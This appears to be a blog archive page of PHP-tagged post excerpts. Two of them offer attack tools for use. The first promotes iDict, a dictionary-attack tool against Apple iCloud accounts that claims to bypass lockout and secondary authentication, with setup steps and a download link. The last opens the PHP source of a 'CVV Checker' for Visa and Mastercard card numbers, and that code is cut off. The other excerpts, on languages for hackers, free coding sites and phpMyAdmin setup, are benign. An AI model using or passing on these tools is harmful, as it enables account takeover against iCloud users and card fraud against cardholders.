Posts

Showing posts with the label PHP

IDICT - A Brute Force Tool For User Passwords iCloud

Image
a small project on Github with a php tool for dictionary attacks against Apple iCloud IDs, evading restrictions and account lockout secondary authentication on any account. To use it simply download and unzip the htdocs folder on the Web server (tested on XAMP) and install CURL on your OS. Do not forget to enable the CURL extension uncommenting the following line in your php.ini file: ; Extension = php_curl.dll Then go to http://127.0.0.1/iDict/ in your web browser (preferably Firefox, Chrome or Safari). Wordlist.txt is iBrute and meets the requirements iCloud password Its author and of course we are not responsible for their use are given (check the restrictions in your country). Update: iDictPy published, one (! Ironic lol) python version DOWNLOAD LINK :  https://github.com/Pilfer/iDictPy

Best Programming Languages For Hackers

Image
For Web App Pentesting /Hacking HTML Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don’t know HTML you should first learn it JAVAScript Learning java script. Will help you understand the basics of Cross Site Scripting PHP/SQL Majority of web applications are written using PHP and MySQL .So it is a must to learn PHP For Writing / Understanding Exploits, Shell Codes, Root kits etc C & C++ More than 60 % of the exploits you will find on the web are written in C & C ++, Learning C & C++ will help you understand about Buffer overflows, Stack overflow etc, So learning C and C ++ is must for every hacker/Pen tester Assembly Learning assembly will help you in Writing/understanding Shell codes , Will Help you in Reverse Engineering applications and software’s For Building Tools And Scripts Python Python is a very powerful high level la...

50 Websites To Learn How To Code For Free

Image
Searching for where to learn how to code for free,then stop.You are in perfect place,here we are listing Top 50 websites that will help you to learn how to code.Below listed website will help you to find a good coding platform for beginners.From here you will learn HTML, CSS, Javascript, SQL, XHTML, Bootstrap, C, C++, Python, Ruby, Android Development, Java and lots more.So check out each of this website and start to learn how to code. 1. Codecademy The most heard name how to code.Codeacademy is the place to go if you aren’t quite sure where to start.The main plus point of Codecademy is that they have a advanced interface to type code and render it without using external notepad or browser.Codeacademy works on a reward system and it rewards you with badges for your achievements.Codecademy will help you to learn HTML & CSS, JavaScript, jQuery, PHP, Python, SQL, Ruby, Rails and AngularJS. 2. Udacity Udacity is the next best on the web to learn to code.Udacity offers video tutorials i...

How To Install and Secure phpMyAdmin

Image
How To Install and Secure phpMyAdmin Relational database management systems like MySQL are needed for a significant portion of web sites and applications. However, not all users feel comfortable administering their data from the command line. To solve this problem, a project called phpMyAdmin was created in order to offer an alternative in the form of a web-based management interface. In this guide, we will demonstrate how to install and secure a phpMyAdmin configuration on an Ubuntu 14.04 server. We will build this setup on top of the Nginx web server, which has a good performance profile and can handle heavy loads better than some other web servers. Before we begin, there are a few requirements that need to be settled. Ubuntu Server LEMP (Linux, Nginx, MySQL, and PHP) stack on your Ubuntu server. Install phpMyAdmin With our LEMP platform already in place, we can begin right away with installing the phpMyAdmin software. sudo apt-get update sudo apt-get install phpmyadmin During the in...

CVV Checker (Visa & Mastercard)

Save it as something.php upload it a host and check PHP Code: <?php ob_start (); @ session_start (); set_time_limit ( 0 ); function  _curl ( $url , $post = "" , $usecookie  =  false ) {       $ch  =  curl_init ();     if( $post ) {          curl_setopt ( $ch ,  CURLOPT_POST  , 1 );          curl_setopt  ( $ch ,  CURLOPT_POSTFIELDS ,  $post );     }      curl_setopt ( $ch ,  CURLOPT_URL ,  $url );      curl_setopt ( $ch ,  CURLOPT_FOLLOWLOCATION ,  1 );      curl_setopt ( $ch ,  CURLOPT_USERAGENT ,  "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3" );      curl_setopt ( $ch ,  CURLOPT_SSL...